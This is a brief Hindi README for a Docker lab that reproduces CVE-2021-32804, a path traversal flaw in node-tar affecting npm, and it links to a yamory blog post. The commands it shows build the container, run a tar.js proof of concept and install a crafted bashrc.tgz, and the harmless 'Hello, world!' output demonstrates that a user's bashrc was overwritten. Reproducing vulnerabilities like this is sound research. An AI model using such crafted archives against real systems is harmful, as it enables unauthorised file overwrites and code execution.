
# CVE-2021-32804 के लिए Docker-आधारित प्रजनन वातावरण, node-tar में एक पाथ ट्रैवर्सल भेद्यता जो npm को प्रभावित करती है, चरण-दर-चरण शोषण स्क्रिप्ट के साथ।
यह रिपॉज़िटरी yamory ब्लॉग 「CVE-2021-32804 npm को भी प्रभावित करने वाली node-tar की पाथ ट्रैवर्सल भेद्यता」 में उपयोग किए गए Docker वातावरण के निर्माण के लिए है।
docker build -t cve-2021-32804 .
docker run -it cve-2021-32804 /bin/bash
root@5e1af2148215:/poc# node tar.js
root@5e1af2148215:/poc# su node
Hello, world!
root@5e1af2148215:/poc# npm i bashrc.tgz
root@5e1af2148215:/poc# su node
Hello, world!